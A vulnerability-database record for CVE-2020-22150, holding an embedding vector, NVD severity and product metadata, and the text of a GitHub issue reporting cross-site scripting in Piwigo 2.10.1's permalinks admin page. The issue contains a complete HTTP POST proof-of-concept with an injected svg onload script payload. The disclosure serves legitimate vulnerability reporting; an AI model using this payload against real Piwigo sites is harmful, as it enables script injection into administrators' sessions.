-0.011656995862722397, -0.019921228289604187, 0.01068120077252388, 0.007873914204537868, 0.006575356237590313, -0.006691701244562864, -0.014824576675891876, -0.021512525156140327, -0.02335902862250805, 0.00997562613338232, -0.0342278815805912, 0.014179049991071224, -0.005783461034297943, 0.0039031796623021364, -0.007254659663885832, 0.00022236864606384188, 0.016213206574320793, -0.006061187479645014, 0.02328396774828434, 0.001968478551134467, -0.0007018217002041638, 0.006211309693753719, 0.009044867940247059, -0.010733744129538536, 0.007442312780767679, 0.009082398377358913, 0.005494475830346346, -0.0023362780921161175, 0.013818756677210331, 0.0024676350876688957, 0.014584380201995373, 0.01043349876999855, -0.009315088391304016, 0.007682508323341608, 0.0021767732687294483, 0.003484713612124324, 0.0033702454529702663, 0.011837142519652843, 0.011521886102855206, -0.00818166509270668, 0.036719910800457, -0.018735261633992195, 0.00613624881953001, 0.007217129226773977, -0.0035034790635108948, -0.0012516445713117719, 0.003062494797632098, -0.010425993241369724, 0.005640845280140638, 0.018074722960591316, -0.010973939672112465, 0.006526566576212645, 0.001395199098624289, 0.004668803419917822, 0.005922324489802122, -0.011784600093960762, -0.012857974506914616, -0.0004738234856631607, -0.02154254913330078, 0.00996811967343092, -0.021347390487790108, 0.00039219448808580637, 0.008039048872888088, 0.00011716575681930408, 0.021752720698714256, -0.01406645867973566, 0.00022494887525681406, 0.004755123518407345, 0.007367251440882683, 0.022683478891849518, -0.023899469524621964, 0.016153158619999886, 0.01109403744339943, -0.01414902601391077, 0.0012919899309054017, 0.005288057494908571, -0.0047363582998514175, 0.008737117052078247, 0.00293113780207932, 0.0020360336638987064, -0.021422451362013817, 0.00675550289452076, -0.015372522175312042, -0.0038187357131391764, 0.01043349876999855, 0.019245678558945656, 0.004038289654999971, -0.014974698424339294, 0.013946360908448696, -0.023899469524621964, 0.025836046785116196, -0.010966433212161064, 0.008962300606071949, -0.0024113391991704702, -0.02319389395415783, -0.01494467444717884, -0.013248291797935963, -0.020011302083730698, -0.007363498210906982, -0.016123134642839432, 0.00010496831964701414, -0.015154845081269741, -0.01547760795801878, 0.019005481153726578, -0.016123134642839432, -0.000391490786569193, -0.019170615822076797, -0.0019290713826194406, -0.00043089789687655866, -0.015642743557691574, 0.009292569942772388, 0.0025745972525328398, 0.010170784778892994, 0.0033270851708948612, 0.007637471426278353, 0.015717804431915283, -0.012249979190528393, -0.009525259025394917, 0.024484945461153984, -0.00006122174818301573, -0.013991397805511951, -0.0022180569358170033, -0.00927005149424076, -0.008579488843679428, 0.010065699927508831, -0.010486042127013206, -0.00755115132778883, -0.013135700486600399, -0.018510079011321068, 0.006500295363366604, -0.007569916546344757, 0.005434426944702864, -0.017639368772506714, 0.005408155731856823, -0.00221993331797421, -0.018900396302342415, 0.016873745247721672, 0.011064012534916401, -0.0027566205244511366, 0.01811975985765457, -0.005265539512038231, -0.002039786661043763, -0.022653453052043915, 0.009127435274422169, 0.00034950344706885517, -0.005100404843688011, -0.01618318259716034, 0.010943914763629436, 0.018510079011321068, -0.01652846485376358, -0.02555081434547901, 0.00043347812606953084, -0.020626801997423172, -0.0006403654115274549, -0.010891372337937355, 0.007569916546344757, -0.006031163036823273, 0.02010137401521206, 0.005982373375445604, 0.005359365604817867, 0.005866028368473053, 0.01360107958316803, -0.001742356806062162, 0.0011015223572030663, -0.004207177087664604, -0.009420174174010754, 0.015552669763565063, 0.008992325514554977, 0.010808805003762245, -0.0012553976848721504, -0.012767900712788105, 0.008511933498084545, -0.010283377021551132, 0.001163447741419077, -0.01594298705458641, -0.018164796754717827, 0.0013858163729310036, 0.012760395184159279, 0.01960597187280655, 0.010493548586964607, 0.0022781058214604855, 0.0018568250816315413, 0.010868853889405727, -0.010253352113068104, 0.03245643898844719, 0.012415113858878613, 0.01021582167595625, 0.004886480513960123, -0.00826423242688179, -0.002326895482838154, 0.008586995303630829, -0.01005068700760603, -0.013113182038068771, -0.015342498198151588, -0.005130429286509752, 0.019395800307393074, 0.022143037989735603, 0.01843501813709736, -0.011649489402770996, 0.022728515788912773, 0.01769941858947277, -0.01343594491481781, -0.0070519945584237576, -0.0027284726966172457, 0.0072509064339101315, -0.01289550494402647, 0.006943156011402607, -0.012069832533597946, -0.004406089428812265, -0.008541958406567574, 0.01180711854249239, 0.007903938181698322, 0.01272286381572485, 0.0009889305802062154, -0.008234207518398762, -0.0047363582998514175, -0.04491658881306648, 0.0019065530505031347, -0.0035241208970546722, 0.004939023405313492, 0.015289955772459507, -0.006019903812557459, 0.037020158022642136, -0.025355655699968338, 0.008226701989769936, 0.006849329452961683, 0.011506873182952404, 0.009697900153696537, 0.0023888209834694862, 0.002784768585115671, -0.013968879356980324, -0.009547777473926544, -0.016333304345607758, -0.017339125275611877, 0.015912963077425957, 0.020716875791549683, -0.0010358438594266772, -0.005051615182310343, -0.0022067977115511894, -0.022173061966896057, -0.023914480581879616, 0.0037774520460516214, -0.0008951041381806135, 0.015912963077425957, -0.01887037232518196, 0.0020060092210769653, -0.02211301401257515, -0.020806949585676193, -0.011416800320148468, -0.012715358287096024, -0.009577802382409573, 0.0075323861092329025, 0.00968288816511631, -0.0015687779523432255, -0.009202496148645878, -0.016663573682308197, -0.005321835167706013, -0.020416632294654846, -0.005430673714727163, -0.013571054674685001, 0.009442691691219807, -0.0018352450570091605, -0.002923631574958563, -0.0012666567927226424, -0.018750274553894997, -0.022173061966896057, -0.02035658247768879, 0.0008397465571761131, 0.005678375717252493, 0.005434426944702864, -0.010816311463713646, 0.01531247328966856, -0.02037159539759159, -0.007581175770610571, 0.00021286871924530715, 0.009787973016500473, -0.006781774573028088, -0.011416800320148468, 0.007918951101601124, 0.01685873419046402, -0.00031807160121388733, 0.01709892973303795, -0.021917855367064476, 0.0010733744129538536, 0.005869781598448753, -0.006166273262351751, 0.0008181664743460715, 0.006218815688043833, -0.04116353392601013, -0.015492620877921581, -0.009074892848730087, -0.0037868348881602287, 0.00034434301778674126, -0.002771632745862007, -0.0028147930279374123, -0.01802968792617321, -0.0031281732954084873, 0.001022708136588335, -0.006001138594001532, -0.032246269285678864, 0.008421860635280609, 0.01709892973303795, -0.00436105253174901, 0.008624525740742683, 0.012542717158794403, -0.01811975985765457, -0.0015678396448493004, -0.0033758750651031733, -0.0229386854916811, 0.01634831726551056, 0.000863203196786344, 0.005963608156889677, -0.007209623232483864, 0.030069494619965553, 0.0025595850311219692, 0.006293877027928829, -0.008421860635280609, -0.020296534523367882, -0.017173990607261658, 0.0013389032101258636, 0.015289955772459507, 0.008061567321419716, -0.004646284971386194, 0.0018127266084775329, -0.011214135214686394, -0.001087448326870799, 0.0004954035393893719, -0.0027228430844843388, -0.015507632866501808, 0.0049652946181595325, -0.023584211245179176, -0.007918951101601124, -0.01660352572798729, 0.02004132606089115, 0.01352601870894432, 0.0008707093074917793, -0.0031281732954084873, -0.0017179619753733277, 0.006541579030454159, -0.002009762218222022, 0.0004665519227273762, -0.017083916813135147, 0.008481909520924091, -0.008684574626386166, -0.01718900166451931, -0.010988951660692692, 0.034498102962970734, -0.012933035381138325, 0.01819482259452343, -0.011829636991024017, 0.00800902396440506, 0.014156532473862171, 0.006999451667070389, 0.02837311290204525, -0.01609310880303383, 0.014726996421813965, 0.004075820092111826, -0.003807476721704006, -0.0059298304840922356, -0.008039048872888088, -0.015387535095214844, 0.02112220600247383, -0.006991945672780275, -0.012737876735627651, 0.0011953487992286682, -0.006853082682937384, 0.02727722004055977, -0.014914649538695812, 0.021707683801651, -0.0015622101491317153, -0.018645187839865685, 0.019410811364650726, 0.019155604764819145, 0.017414186149835587, 0.006522813346236944, -0.004289744421839714, 0.011822130531072617, -0.00022166494454722852, -0.0011212258832529187, 0.0056295860558748245, 0.003646095050498843, -0.019215652719140053, -0.003978240769356489, 0.0056295860558748245, 0.020146410912275314, -0.010373449884355068, 0.030354727059602737, 0.013278316706418991, 0.013923842459917068, -0.0029442734085023403, 0.010163279250264168, -0.006459011696279049, 0.014599393121898174, -0.018675213679671288, 0.010013156570494175, -0.008789660409092903, 0.010988951660692692, 0.011259172111749649, -0.0015856666723266244, -0.015289955772459507, -0.005385637283325195, -0.0058134859427809715, -0.007524879649281502, 0.017128953710198402, -0.02462005615234375, -0.03720030188560486, 0.02277355082333088, 0.004856456071138382, -0.00014273346459958702, -0.00024183762434404343, -0.011184110306203365, -0.0069769336842000484, 0.015462595969438553, 0.03161575272679329, -0.003068124409765005, 0.006642911583185196, -0.0028410644736140966, -0.010561103001236916, -0.0057008941657841206, 0.008324281312525272, -0.016423378139734268, -0.0025558320339769125, 0.02604621835052967, -0.013781226240098476, 0.0007642162963747978, -0.00046397169353440404, -0.028658345341682434, 0.009307581931352615, 0.011116555891931057, 0.00030423220596276224, -0.014907143078744411, 0.01310567557811737, -0.00048179872101172805, -0.000013289634807733819, -0.015072277747094631, 0.0007454510196112096, -0.016588512808084488, 0.01927570253610611, 0.017999662086367607, 0.01540254708379507, -0.011206628754734993, -0.0020547988824546337, 0.004150881431996822, -0.002812916412949562, 0.01047103013843298, -0.008699586614966393, 0.012227460741996765, -0.01870523765683174, -0.0024488698691129684, -0.017654381692409515, -0.001974108163267374, -0.016063084825873375, -0.0003645156975835562, -0.012114868499338627, -0.0011193493846803904, 0.007903938181698322, 0.004038289654999971, 0.012572742067277431, 0.009112423285841942, -0.033837564289569855, 0.011026482097804546, -0.01243012584745884, 0.01784954033792019, -0.00801653042435646, -0.002918001962825656, -0.006140001583844423, 0.009923083707690239, -0.01068870723247528, 0.00347533100284636, 0.017249051481485367, -0.010636163875460625, -0.019320739433169365, -0.007671249099075794, -0.012993084266781807, 0.0023850679863244295, 0.030444800853729248, 0.010350932367146015, 0.006140001583844423, -0.003970734775066376, 0.01022332813590765, 0.02436484768986702, -0.010816311463713646, 0.010568609461188316, -0.004102091770619154, -0.010951421223580837, -0.00009734492050483823, -0.018239857628941536, -0.008421860635280609, -0.00408707931637764, -0.002287488430738449, -0.01727907545864582, -0.0033195791766047478, 0.03404773399233818, 0.003888167440891266, -0.011664502322673798, -0.0006103409104980528, 0.004582482855767012, -0.012084844522178173, -0.00008579254063079134, -0.0008866597781889141, 0.005948595702648163, 0.014516825787723064, -0.008054060861468315, -0.0019985029939562082, 0.005565783940255642, 0.008594500832259655, -0.0038262419402599335, 0.009547777473926544, -0.005141688510775566, 0.004924010951071978, -0.027682550251483917, -0.001181274768896401, -0.0008908819872885942, 0.02678181603550911, 0.004135868977755308, 0.043265245854854584, -0.009705405682325363, -0.02679682895541191, -0.03269663453102112, 0.03461819887161255, 0.011784600093960762, 0.010148267261683941, 0.006808045785874128, 0.010501054115593433, 0.00021697362535633147, -0.003225752618163824, -0.017384162172675133, -0.01735413633286953, -0.014719490893185139, -0.0000695488415658474, 0.007067007012665272, -0.010988951660692692, 0.010778780095279217, -0.004927764181047678, -0.007487349212169647, 0.023073796182870865, 0.023148857057094574, 0.0022593403700739145, 0.00659412145614624, 0.0015396917006000876, 0.003445306560024619, 0.01117660477757454, -0.016378341242671013, -0.0037493042182177305, 0.006072446703910828, 0.009705405682325363, 0.01969604380428791, 0.009277557954192162, -0.012362570501863956, 0.005678375717252493, -0.0004172930493950844, -0.023554187268018723, -0.01986117847263813, 0.018134772777557373, 0.022473307326436043, 0.02970920130610466, 0.012820444069802761, -0.003349603619426489, -0.023253943771123886, -0.0043648057617247105, 0.00719461077824235, -0.011784600093960762, 0.012872986495494843, -0.020641814917325974, 0.011401788331568241, -0.005370624829083681, 0.007509867660701275, -0.016978831961750984, 0.005288057494908571, -0.0016109998105093837, -0.001175645156763494, -0.003449059557169676, 0.014404233545064926, -0.006462764460593462, -0.005224255844950676, 0.025685923174023628, -0.01430665422230959, -0.016873745247721672, -0.010501054115593433, -0.01977110654115677, -0.023419076576828957, -0.004248460754752159, 0.012129881419241428, -0.012467656284570694, 0.027577465400099754, -0.003792464267462492, 0.014111495576798916, -0.00997562613338232, 0.011694526299834251, 0.008129121735692024, -0.01122914720326662, -0.029258834198117256, -0.01131171453744173, 0.012062326073646545, 0.0075736697763204575, -0.0035034790635108948, -0.0038243653252720833, -0.012242472730576992, 0.022638441994786263, -0.0033890106715261936, 0.011416800320148468, 0.009082398377358913, 0.003846883773803711, -0.013030614703893661, -0.007228388451039791, -0.013886312022805214, -0.019681032747030258, 0.009450198151171207, -0.0012281880481168628, -0.0007370066014118493, -0.012392595410346985, 0.019681032747030258, 0.005265539512038231, -0.0022949944250285625, -0.02970920130610466, -0.022323185577988625, -0.01619819551706314, -0.028192967176437378, 0.0031581977382302284, 0.0039106858894228935, -0.009337606839835644, -0.01784954033792019, 0.0033120729494839907, -0.010365944355726242, -0.00695066200569272, -0.008031542412936687, 0.009082398377358913, -0.006061187479645014, 0.0033965168986469507, -0.014726996421813965, -0.012692839838564396, 0.020972084254026413, 0.009870540350675583, 0.02403457835316658, 0.00765623664483428, -0.011064012534916401, -0.015132326632738113, -0.021062158048152924, 0.004837690852582455, 0.006549085024744272, -0.01122914720326662, 0.0057421778328716755, 0.00784388929605484, -0.028238002210855484, 0.021722694858908653, 0.012835456058382988, -0.013068145141005516, -0.0006164396763779223, -0.003274542512372136, -0.012925528921186924, -0.03431795537471771, 0.013030614703893661, 0.015109808184206486, 0.022263135761022568, 0.007483595982193947, -0.03302690386772156, 0.019335750490427017, -0.007247153669595718, 0.011379269883036613, -0.016963819041848183, -0.03161575272679329, 0.022728515788912773, -0.011439318768680096, 0.0023531669285148382, -0.009014843963086605, -0.014749514870345592, -0.05158201977610588, 0.005550771486014128, -0.009157460182905197, -0.011859660968184471, -0.004203424323350191, -0.0076487306505441666, 0.014651935547590256, 0.01117660477757454, -0.00972792413085699, -0.006477776914834976, -0.01619819551706314, -0.015882939100265503, 0.010373449884355068, 0.005524500273168087, -0.007363498210906982, 0.017399173229932785, -0.005978620145469904, 0.013390908017754555, -0.008211689069867134, -0.016723623499274254, 0.028943577781319618, -0.003413405502215028, -0.012872986495494843, -0.007911444641649723, -0.013533524237573147, -0.018885383382439613, 0.009652863256633282, 0.015927975997328758, -0.01243012584745884, -0.023238930851221085, 0.004563717637211084, 0.023344015702605247, 0.016708610579371452, 0.0005892299814149737, -0.005385637283325195, -0.00002920347651524935, 0.027247196063399315, -0.0026684238109737635, 0.0023775617592036724, -0.01870523765683174, 0.016873745247721672, 0.022518344223499298, -0.005318081937730312, -0.017654381692409515, 0.02161761000752449, 0.013263304717838764, -0.018975457176566124, -0.006898119114339352, -0.003833747934550047, 0.01977110654115677, -0.01468946598470211, -0.013450956903398037, 0.012692839838564396, 0.004815172404050827, 0.010801298543810844, 0.012572742067277431, 0.015327486209571362, -0.006519060581922531, -0.010876360349357128, 0.009059879928827286, 0.017294088378548622, 0.016078097745776176, -0.003238888457417488, 0.009210002608597279, -0.015207388438284397, -0.015627730637788773, 0.013398414477705956, -0.011244159191846848, 0.0004276139661669731, 0.020836973562836647, 0.005171712953597307, 0.009149953722953796, 0.009382642805576324, -0.012302521616220474, -0.00408707931637764, -0.0007013526046648622, -0.00033777515636757016, 0.016123134642839432, 0.012197435833513737, 0.011334232985973358, 0.01305313315242529, 0.00013604832929559052, -0.0003757748636417091, 0.005873534828424454, -0.0001903503725770861, 0.005224255844950676, 0.0013783102622255683, -0.006079952698200941, 0.00007699631532886997, -0.012032301165163517, -0.006151260808110237, 0.00943518616259098, 0.0074348063208162785, -0.03152568265795708, 0.016558488830924034, 0.004668803419917822, 0.005584549158811569, 0.0035897993948310614, -0.032666608691215515, -0.011251665651798248, 0.02244328334927559, 0.012234966270625591, -0.005708400160074234, -0.012685333378612995, -0.006721725687384605, 0.03122543729841709, 0.002281858818605542, -0.017834527418017387, -0.005239267833530903, -0.01775946654379368, 0.0003628737176768482, -0.0108463354408741, -0.001182213076390326, 0.00443986663594842, -0.006853082682937384, -0.005843510385602713, -0.0032651599030941725, -0.02095707133412361, 0.006853082682937384, 0.009863034822046757, 0.015807876363396645, 0.007971493527293205, 0.03714025393128395, 0.009022349491715431, 0.011131567880511284, 0.013413426466286182, 0.007134561892598867, 0.017474234104156494, -0.017339125275611877, -0.012310028076171875, -0.03095521591603756, 0.0006295753410086036, -0.005539512727409601, -0.005141688510775566, -0.01568777859210968, 0.00443986663594842, -0.00302684074267745, -0.01986117847263813, 0.014284135773777962, -0.002178649650886655, 0.016813697293400764, -0.01218242384493351, 0.007340980228036642, -0.014734502881765366, 0.005712153390049934, 0.016393354162573814, 0.006526566576212645, -0.004030783660709858, -0.006166273262351751, -0.0025520790368318558, -0.005314329173415899, -0.00249390653334558, 0.024004554376006126, 0.006331407465040684, -0.015507632866501808, 0.005592055153101683, 0.009900565259158611, -0.02211301401257515, -0.015012228861451149, 0.018555115908384323, 0.0030418529640883207, -0.016003036871552467, 0.018374968320131302, 0.004000759217888117, -0.031165387481451035, -0.005798473488539457, -0.02586607076227665, 0.025655899196863174, -0.0007346609490923584, -0.007948975078761578, 0.0010546090779826045, -0.006691701244562864, -0.003899426432326436, -0.027337269857525826, -0.010253352113068104, -0.005907312035560608, 0.013571054674685001, -0.0012338175438344479, 0.0020060092210769653, 0.01005068700760603, 0.019410811364650726, 0.020912034437060356, -0.030745044350624084, -0.010996458120644093, 0.02504039742052555, 0.005888546817004681, 0.004124609753489494, -0.00044473729212768376, -0.016558488830924034, -0.007994011975824833, 0.009930589236319065, 0.004372311756014824, 0.025340642780065536, -0.0018934174440801144, -0.006459011696279049, -0.021812768653035164, -0.005438180174678564, 0.003914438653737307, 0.019575946033000946, 0.009172472171485424, -0.01540254708379507, 0.018299907445907593, -0.0012872986262664199, 0.0073034493252635, -0.015462595969438553, -0.00024910917272791266, 0.013833768665790558, 0.00921750906854868, 0.005273045506328344, 0.04149379953742027, -0.009187484160065651, 0.021902842447161674, 0.00023644260363653302, -0.009945602156221867, -0.006969427224248648, 0.018059711903333664, 0.003268912900239229, 0.007637471426278353, 0.008294256404042244, -0.015139833092689514, 0.014103989116847515, 0.008226701989769936, 0.012520198710262775, 0.002771632745862007, 0.01935076341032982, -0.00667668879032135, -0.01477203331887722, -0.010996458120644093, 0.004342287313193083, 0.020131399855017662, -0.0039106858894228935, -0.01264029648154974, 0.0005775016616098583, -0.015432571060955524, -0.0005559216369874775, 0.010200809687376022, -0.026826852932572365, -0.006151260808110237, -0.005708400160074234, -0.01051606610417366, 0.024590032175183296, -0.019906215369701385, 0.030009446665644646, -0.00084537616930902, -0.0006933773402124643, -0.00695066200569272, -0.004274732433259487, 0.0019947499968111515, 0.007866407744586468, 0.002210550708696246, 0.004627519752830267, -0.01351851224899292, 0.00746858399361372, 0.0019159357761964202, 0.0034546891693025827, 0.012505186721682549, -0.018344944342970848, 0.0005390328587964177, 0.0010386585490778089, -0.0033983932808041573, 0.018990470096468925, -0.019545922055840492, 0.010606139898300171, -0.013300835154950619, 0.002510795369744301, 0.005254280287772417, 0.007708779536187649, -0.014839588664472103, -0.0009227829286828637, 0.0014214704278856516, -0.0007965863915160298, -0.019485874101519585, 0.0027960275765508413, 0.009667875245213509, 0.0006239457870833576, -0.02286362461745739, 0.009442691691219807, 0.005393143277615309, -0.0036779961083084345, 0.014719490893185139, 0.0047776419669389725, 0.0014880872331559658, 0.0020191448274999857, 0.021347390487790108, -0.011589440517127514, 0.006282617803663015, 0.024394871667027473, 0.01819482259452343, 0.016048073768615723, -0.008211689069867134, 0.016918782144784927, -0.021497512236237526, 0.010966433212161064, -0.022548368200659752, -0.016708610579371452, -0.0031281732954084873, 0.001890602638013661, 0.006207556929439306, 0.009690393693745136, 0.0010593003826215863, -0.024319810792803764, 0.0046650501899421215, 0.0076487306505441666, -0.012054819613695145, 0.0037830816581845284, 0.014839588664472103, -0.0007698458503000438, -0.00031994812889024615, -0.004620013292878866, 0.03164577856659889, 0.006898119114339352, 0.00765998987480998, 0.01742919720709324, -0.0026665471959859133, 0.04095336049795151, 0.029829299077391624, -0.008354305289685726, 0.01318824291229248, 0.012767900712788105, 0.0026684238109737635, -0.01014076080173254, -0.007453571539372206, 0.013165724463760853, -0.012295016087591648, 0.007783840876072645, -0.014817070215940475, -0.026676731184124947, -0.04296499863266945, -0.0048902337439358234, 0.007652483880519867, -0.02513047121465206, -0.012497681193053722, 0.01760934479534626, -0.007187104783952236, -0.00038867598050273955, 0.008954795077443123, 0.011987265199422836, 0.024635067209601402, 0.017639368772506714, -0.01570279151201248, 0.016813697293400764, 0.0006722664111293852, 0.008436872623860836, 0.0029029897414147854, 0.009615332819521427, 0.004454879090189934, -0.01953090913593769, 0.009547777473926544, 0.014464282430708408, -0.005802226718515158, -0.006834317464381456, -0.00013827670773025602, -0.01735413633286953, -0.0229536984115839, -0.007813865318894386, 0.025971155613660812, 0.0325164869427681, -0.001442112261429429, 0.010013156570494175, 0.0006844638264738023, 0.017489247024059296, 0.047618791460990906, 0.00444361986592412, -0.013083158060908318, -0.01777447946369648, 0.020671838894486427, -0.0039031796623021364, -0.008939782157540321, -0.002634646138176322, 0.0567762516438961, 0.002111094770953059, 0.010020663030445576, 0.005014084745198488, -0.01164198387414217, -0.010043181478977203, -0.011799612082540989, 0.012557730078697205, 0.003062494797632098, 0.007686261087656021, -0.01055359747260809, -0.001109966658987105, 0.007708779536187649, 0.003918191883713007, 0.0010367820505052805, -0.0011324849911034107, -0.0030230877455323935, -0.0021298599895089865, -0.010358437895774841, -0.005096651613712311, -0.007179598789662123, -0.004451125860214233, 0.017339125275611877, -0.004466138314455748, -0.007247153669595718, 0.0032876781187951565, 0.023674285039305687, 0.00182023283559829, -0.001109966658987105, -0.03623951971530914, 0.0058998060412704945, -0.01117660477757454, 0.036419667303562164, -0.020761912688612938, 0.004499915521591902, 0.010891372337937355, -0.013946360908448696, 0.013796238228678703, 0.01280543114989996, -0.020416632294654846, 0.009067386388778687, -0.018059711903333664, -0.005978620145469904, -0.020506704226136208, -0.010651176795363426, 0.002233069157227874, -0.021887829527258873, -0.0012188053224235773, -0.0018099119188264012, 0.009817997924983501, -0.01272286381572485, -0.0006004891474731266, -0.011844648979604244, 0.00888723973184824, -0.008624525740742683, 0.001394260791130364, 0.0004686630272772163, 0.0007130808662623167, -0.0023362780921161175, 0.025340642780065536, -0.009660369716584682, -0.012069832533597946, -0.006177532486617565, -0.007888926193118095, -0.016588512808084488, 0.02787770889699459, 0.006353925913572311, 0.01762435771524906, 0.007337226998060942, 0.03353732079267502, 0.020146410912275314, 0.007686261087656021, 0.0015584570355713367, -0.0017170236678794026, 0.0012450767681002617, -0.008977312594652176, 0.0171139407902956, 0.01676866039633751, 0.0007670311024412513, -0.005738424602895975, 0.009945602156221867, 0.0038018471095710993, -0.002364426152780652, -0.019906215369701385, -0.00818166509270668, 0.001814603223465383, -0.013803744688630104, -0.0067967865616083145, -0.01636333018541336, -0.0045074219815433025, -0.0009021411533467472, 0.03972235694527626, -0.0049615418538451195, 0.004529939964413643, 0.009097411297261715, 0.002340031322091818, -0.006466517690569162, -0.004229695536196232, 0.0011202875757589936, -0.011619465425610542, 0.008767141960561275, 0.0061287423595786095, -0.025911107659339905, 0.023584211245179176, -0.011244159191846848, 0.001861516386270523, -0.007134561892598867, -0.009142447263002396, -0.004383570980280638, 0.012047314085066319, 0.028568271547555923, 0.022143037989735603, 0.012655309401452541, 0.0027866449672728777, 0.004544952418655157, -0.003985746763646603, -0.015365016646683216, 0.004811419639736414, -0.0005582672893069685, 0.0055620307102799416, -0.006143754813820124, -0.007127055898308754, 0.04458631947636604, 0.003835624549537897, 0.0029874336905777454, -0.010546091012656689, -0.001152188633568585, 0.007994011975824833, 0.006706713233143091, 0.012985577806830406, 0.0061550140380859375, -0.015612718649208546, 0.013646116480231285, 0.014336679130792618, -0.0009293507901020348, 0.023809395730495453, 0.0036442186683416367, 0.042514633387327194, 0.008511933498084545, -0.006635405123233795, -0.014711984433233738, 0.039782408624887466, -0.00842936709523201, -0.0158529132604599, -0.01951589807868004, 0.02486025169491768, 0.0025201779790222645, -0.008744623512029648, -0.00943518616259098, -0.015207388438284397, 0.025400690734386444, 0.023554187268018723, 0.026841865852475166, -0.010155772790312767, -0.01810474880039692, 0.027427341789007187, -0.01609310880303383, 0.009232521057128906, -0.016318293288350105, 0.011904697865247726, -0.00825672596693039, -0.01431416068226099, -0.006068693473935127, -0.006916884332895279, 0.01702386699616909, 0.007487349212169647, -0.0075323861092329025, 0.012557730078697205, 0.00765998987480998, -0.008271737955510616, -0.004147128202021122, -0.003443429945036769, -0.023719321936368942, 0.005550771486014128, -0.003238888457417488, 0.0038224889431148767, -0.001145620713941753, -0.019140591844916344, -0.0007942407391965389, -0.001813664915971458, -0.015552669763565063, 0.0016297651454806328, -0.016738634556531906, 0.014209074899554253, 0.0030155815184116364, -0.0031994814053177834, -0.017654381692409515, -0.01762435771524906, -0.0061287423595786095, -0.008586995303630829, -0.008586995303630829, 0.012069832533597946, -0.002463882090523839, 0.002901113359257579, 0.00294239679351449, 0.025986168533563614, -0.023584211245179176, 0.009397655725479126, 0.025055410340428352, -0.015988023951649666, -0.0032276292331516743, 0.00284669385291636, 0.00784388929605484, 0.0008500674739480019 ]
CVE-2020-22150
2021-07-21T17:15:08.167000
A cross site scripting (XSS) vulnerability in /admin.php?page=permalinks of Piwigo 2.10.1 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1158
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hi team! I found a XSS in XSS in /admin.php?page=permalinks Exploit Request: ``` POST /piwigo/piwigo/admin.php?page=permalinks HTTP/1.1 Host: 192.168.10.138 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 138 Origin: http://192.168.10.138 Connection: close Referer: http://192.168.10.138/piwigo/piwigo/admin.php?page=permalinks Cookie: pwg_id=ragm92nc6a3rr532fi0h9h6f21 Upgrade-Insecure-Requests: 1 cat_id=3&permalink=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&save=on&set_permalink=Submit&pwg_token=2048f9dd482aaca003e193045fd4f763 ``` PoC: ![](https://i.imgur.com/MtpbJZA.png) ![](https://i.imgur.com/OTEVWml.png)
XSS in /admin.php?page=permalinks
https://api.github.com/repos/Piwigo/Piwigo/issues/1158/comments
3
2020-02-12T03:32:27
2021-12-07T11:25:28Z
https://github.com/Piwigo/Piwigo/issues/1158
563,727,063
1,158
true
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : XSS in /admin.php?page=permalinks Issue date: --- start body --- Hi team! I found a XSS in XSS in /admin.php?page=permalinks Exploit Request: ``` POST /piwigo/piwigo/admin.php?page=permalinks HTTP/1.1 Host: 192.168.10.138 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 138 Origin: http://192.168.10.138 Connection: close Referer: http://192.168.10.138/piwigo/piwigo/admin.php?page=permalinks Cookie: pwg_id=ragm92nc6a3rr532fi0h9h6f21 Upgrade-Insecure-Requests: 1 cat_id=3&permalink=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&save=on&set_permalink=Submit&pwg_token=2048f9dd482aaca003e193045fd4f763 ``` PoC: ![](https://i.imgur.com/MtpbJZA.png) ![](https://i.imgur.com/OTEVWml.png) --- end body ---
1,031
